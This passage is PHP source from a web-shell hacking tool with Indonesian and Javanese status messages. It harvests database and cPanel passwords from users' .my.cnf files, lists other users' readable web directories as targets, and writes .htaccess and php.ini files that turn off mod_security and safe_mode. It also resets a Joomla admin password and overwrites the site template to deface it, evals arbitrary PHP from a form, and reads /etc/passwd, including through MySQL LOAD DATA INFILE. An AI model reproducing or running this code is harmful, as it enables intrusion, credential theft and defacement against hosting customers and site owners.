$usr = array();
$dmn = array();
foreach($mck as $o) {
    $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
    $usr[] = $infos['name'];
    $dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
    $r = explode(':',$d);
    if(strpos($r[5],'home')) {
        $passwd[$r[0]] = $r[5];
    }
}
$l=0;
$j=1;
foreach($usr as $r) {
$dirz = '/home/'.$r.'/.my.cnf';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$r.'.txt');
$p=file_get_contents(''.$path.'/'.$r.'.txt');
$password=entre2v2($p,'password="','"');
echo "<tr><td class=olenk2>".$count++."</td><td class=olenk2><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td class=olenk2>'.$r."</td><td class=olenk2>".$password."</td><td class=olenk2><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
$dc++;
                flush();
                $l=$l?0:1;
                $j++;
                                }
            }
                        }
echo '</table>';
$total = $dc;
echo '<br><div class="olenk2">Total cp = '.$total.'</h3><br />';
echo '</center>';
 
}
}else{
echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
}
 
echo "<br>&#169; <font class='olenk5'>./elro-BN404</font> | BN-IDBTE4M";
echo "</body></html>";
}
?>
<?php
if(isset($_GET['roct']) && ($_GET['roct'] == 'jump'))
    {
    ($sm = ini_get('safe_mode') == 0) ? $sm = 'off' : die('<br/><br/><nobr><span class=olenk5>SAFE MODE ON</span></nobr><br/><br/>');
    set_time_limit(0);
    @$passwd = fopen('/etc/passwd-', 'r');
    if (!$passwd) {
        die('<br/><br/><nobr><span class=olenk5>READ ETC/PASSWD- NOT AVAILABLE</span></nobr><br/><br/>');
    }
    $pub = array();
    $users = array();
    $conf = array();
    $i = 0;
    while (!feof($passwd)) {
        $str = fgets($passwd);
        if ($i > 10) {
            $pos = strpos($str, ':');
            $username = substr($str, 0, $pos);
            $dirz = '/home/' . $username . '/public_html/';
            if (($username != '')) {
                if (is_readable($dirz)) {
                    array_push($users, $username);
                    array_push($pub, $dirz);
                }
            }
        }
        $i++;
    }
    echo "<br/><br/><nobr><b><span class='olenk4'>-=[[ READABLE PUBLIC_HTML ]]=-</span></b></nobr><br/><br/><b><span class='olenk6'>TOTAL : " . sizeof($pub) . " TARGET VICTIM</span>" . "</b><br>";
    foreach ($users as $user) {
        $path = "/home/$user/public_html/";
        echo "<br>";
        echo "<span class='olenk4'>[OK]</span>==><a href='?y=$path' target='_blank'><span class='olenk5'> $path</span></a><br>";
    }
    echo "<br>";
    echo "</br>";
}
?>
<?php
if (isset($_GET['pbm']) && ($_GET['pbm'] == 'bypass')) {
?>
<form action="?&amp;pbm=bypass" method="post">
<?php
@error_reporting(0);
$htaccess = fopen('.htaccess', 'w');
$phpini = fopen('php.ini', 'w');

$pbm1 = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>";

$pbm2 = "safe_mode = OFF
Safe_mode_gid = OFF
disable_functions = NONE
disable_classes = NONE
open_basedir = OFF
suhosin.executor.func.blacklist = NONE";

    fwrite($htaccess, $pbm1);
    fwrite($phpini, $pbm2);
    $pbm3 = "<center><br/><br/><nobr><b><span class='olenk4' size='5'>-=[[ BYPASS SECURITY ]]=-</span></b></nobr><br/><br/><nobr><span class='olenk6'>[+] safemode off [+]<br>[+] disablefunction off [+]</span><br><span class='olenk4'>sukses kang... ^_^ </span></nobr><br/><br/></center>";
    echo $pbm3;
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'cp')) {
?>
<form action="?&amp;idb=cp" method="post">
<?php
/**
 * @author: FaisaL Ahmed aka blue X
 * @mail: [email protected]
 * @Screenshot: http://prntscr.com/7c1p34
 * @Last Updated: 01 June 2015
*/
 
@ini_set('display_errors',0);
function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
    $ar0=explode($marqueurDebutLien, $text);
    $ar1=explode($marqueurFinLien, $ar0[$i]);
    return trim($ar1[0]);
}
echo "<center>";
$d0mains = @file('/etc/named.conf');
$domains = scandir("/var/named");
 
if ($domains or $d0mains)
{
    $domains = scandir("/var/named");
    if($domains) {
echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
$count=1;
$dc = 0;
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dirz = '/home/'.$owner['name'].'/.my.cnf';
$path = getcwd();
 
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
$password=entre2v2($p,'password="','"');
echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
$dc++;
}
 
}
}
echo '</table>';
$total = $dc;
echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
echo '</center>';
}else{
$d0mains = @file('/etc/named.conf');
    if($d0mains) {
echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
$count=1;
$dc = 0;
$mck = array();
foreach($d0mains as $d0main){
    if(@eregi('zone',$d0main)){
        preg_match_all('#zone "(.*)"#',$d0main,$domain);
        flush();
        if(strlen(trim($domain[1][0])) >2){
            $mck[] = $domain[1][0];
        }
    }
}
$mck = array_unique($mck);
$usr = array();
$dmn = array();
foreach($mck as $o) {
    $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
    $usr[] = $infos['name'];
    $dmn[] = $o;
}
array_multisort($usr,$dmn);
$dt = file('/etc/passwd');
$passwd = array();
foreach($dt as $d) {
    $r = explode(':',$d);
    if(strpos($r[5],'home')) {
        $passwd[$r[0]] = $r[5];
    }
}
$l=0;
$j=1;
foreach($usr as $r) {
$dirz = '/home/'.$r.'/.my.cnf';
$path = getcwd();
if (is_readable($dirz)) {
copy($dirz, ''.$path.'/'.$r.'.txt');
$p=file_get_contents(''.$path.'/'.$r.'.txt');
$password=entre2v2($p,'password="','"');
echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
$dc++;
                flush();
                $l=$l?0:1;
                $j++;
                                }
            }
                        }
echo '</table>';
$total = $dc;
echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
echo '</center>';
 
}
}else{
echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
}

echo "</body></html>";
}
?>
<?php
if (isset($_GET['idb']) && ($_GET['idb'] == 'jomblo')) {
?>
<form action="?&amp;idb=jomblo" method="post">
<?
if ($_POST['form_action'])
{

$h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";

 $dbprefix=($_POST['db_prefix']);
 $username=($_POST['db_username']);
 $password=($_POST['db_password']);
 $dbname=($_POST['db_name']);
  $site_url=($_POST['site_url']);

$co=randomt();



      $link=mysql_connect("localhost",$username,$password) ;

         mysql_select_db($dbname,$link) ;

$tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '71a4d4cd2f30b185d707718273b17d05:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
echo("<br>[+] Changing admin password to jancok");   
       
       $req =mysql_query("SELECT * from  `".$dbprefix."extensions` ");
       
if ( $req )
{
#################################################################
######################        V1.6         ######################
#################################################################

      
$req =mysql_query("SELECT * from  `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
    $data = mysql_fetch_array($req);
$template_name=$data["template"];

$req =mysql_query("SELECT * from  `".$dbprefix."extensions` WHERE name='".$template_name."'");
    $data = mysql_fetch_array($req);
$template_id=$data["extension_id"];

$url2=$site_url."/index.php";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 


$buffer = curl_exec($ch);

$return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);

///////////////////////////
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$pos = strpos($buffer,"com_config");
if($pos === false) {
echo("<br>[-] Ora iso login bos");
exit;
}
else {
echo("<br>[+] Mantap bos");
}
///////////////////////////
$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
if($hidden2) {
echo("<br>[+] index.php file founded in Theme Editor");
}
else {
echo("<br>[-] index.php Not found in Theme Editor");
exit;
}
echo("<br>[*] Updating Index.php .....");
$url2=$site_url."/index.php?option=com_templates&layout=edit";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$pos = strpos($buffer,'<dd class="message message">');
if($pos === false) {
echo("<br>[-] ora iso ganti index.php bos, manual wae yo :P");
exit;
}
else {
echo("<br>[+] Index.php wis tak ganti");
}
#################################################################
######################      V1.6  END      ######################
#################################################################


}
else
{

#################################################################
######################      V1.5           ######################
#################################################################
       
$req =mysql_query("SELECT * from  `".$dbprefix."templates_menu` WHERE client_id='0'");
    $data = mysql_fetch_array($req);
$template_name=$data["template"];
$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);

$url2=$site_url."/index.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$pos = strpos($buffer,"com_config");

if($pos === false) {
echo("<br>[-] Ora iso Login bos");
exit;
}
else {
echo("<br>[+] Sip iso login bos");
}
///////////////////////////
$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);

if($hidden2) {
echo("<br>[+] index.php Ora eneng neng Editor");
}
else {
echo("<br>[-] index.php Ora temu");
}

echo("<br>[*] sik tak ganti Index.php ne .....");
$url2=$site_url."/index.php?option=com_templates&layout=edit";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url2);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $co); 
    curl_setopt($ch, CURLOPT_COOKIEFILE, $co); 
$buffer = curl_exec($ch);

$pos = strpos($buffer,'<dd class="message message fade">');
if($pos === false) {
echo("<br>[-] Index.php Ora iso diganti");
exit;
}
else {
echo("<br>[+] Index.php wis tak ganti bos");
}
#################################################################
######################      V1.5  END      ######################
#################################################################

}

}


function randomt() { 

    $chars = "abcdefghijkmnopqrstuvwxyz023456789"; 
    srand((double)microtime()*1000000); 
    $i = 0; 
    $pass = '' ; 

    while ($i <= 7) { 
        $num = rand() % 33; 
        $tmp = substr($chars, $num, 1); 
        $pass = $pass . $tmp; 
        $i++; 
    } 

    return $pass; 

}

function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)

{

$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[$i]);
$ar=trim($ar1[0]);
return $ar;
}
echo "

"; 
echo "<title>ch4ng3 th!s sh!ts</title> 

"; 
echo "<body bgcolor=\"#000000\">

"; 
echo " <style>

"; 
echo "

"; 
echo "BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive;   color: white;}

"; 
echo "textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}

"; 
echo "input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}

"; 
echo "</style>

"; 
echo "<center>

"; 
echo "<font color=\"#FFFF6FF\" size='+3'>Hallo BOS</font><br><br>

"; 
echo "<FORM action=\"\"  method=\"post\">

"; 
echo "<input type=\"hidden\" name=\"form_action\" value=\"2\">

"; 
echo "<br>

"; 
echo "<table border=1>

"; 
echo "

"; 
echo "<tr><td>db_prefix </td><td><input type=\"text\" size=\"30\" name=\"db_prefix\" value=\"jos_\"></td></tr>

"; 
echo "<tr><td>db_username </td><td><input type=\"text\" size=\"30\" name=\"db_username\" value=\"\"></td></tr>

"; 
echo "<tr><td>db_password</td><td><input type=\"text\" size=\"30\" name=\"db_password\" value=\"\"></td></tr>

"; 
echo "<tr><td>db_name</td><td><input type=\"text\" size=\"30\" name=\"db_name\" value=\"\"></td></tr>

"; 
echo "<tr><td>Admin Control panel url</td><td><input type=\"text\" size=\"60\" name=\"site_url\" value=\"http://site.com/administrator/\"></td></tr>

"; 
echo "

"; 
echo "</table>

"; 
echo "<br>

"; 
echo "<br>

"; 
echo "<TEXTAREA rows=\"18\"  cols=\"50\" name=\"code\"></TEXTAREA>

"; 
echo "   <br>

"; 
echo "<INPUT class=submit type=\"submit\" value=\"Submit\" name=\"Submit\">

"; 
echo "</FORM>

"; 
echo " <center> <font color=\"#FFFF6FF\" size='+1'>   Change Index | Admin     </font><br><br> <center>
";
}

?>

<?php 
    if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?> 
   <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post"> 
   <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } 
   else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea> 
   <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> 
   <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ 
   if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){ 
   $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; 
   if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">"; 
   $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport; 
   $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>"; if(isset($_GET['db'])) 
   $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; 
   if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; 
   $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; 
   $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){ 
   $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;
CREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );
LOAD DATA INFILE \"/etc/passwd\"
INTO TABLE b374k_table;SELECT * FROM b374k_table;
DROP TABLE IF EXISTS b374k_table;"; 
   $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; 
   $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); 
   foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; } 
   elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array(); 
   $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) 
   $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ 
   if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">"; 
   for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ 
   if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { 
   if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;
SHOW VARIABLES;
SHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>"; 
   $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?> 
   <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> 
   <input type="hidden" name="x" value="mysql" /> 
   <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> 
   <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> 
   <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> 
   <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> 
   <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> 
   <?php }} elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; } 
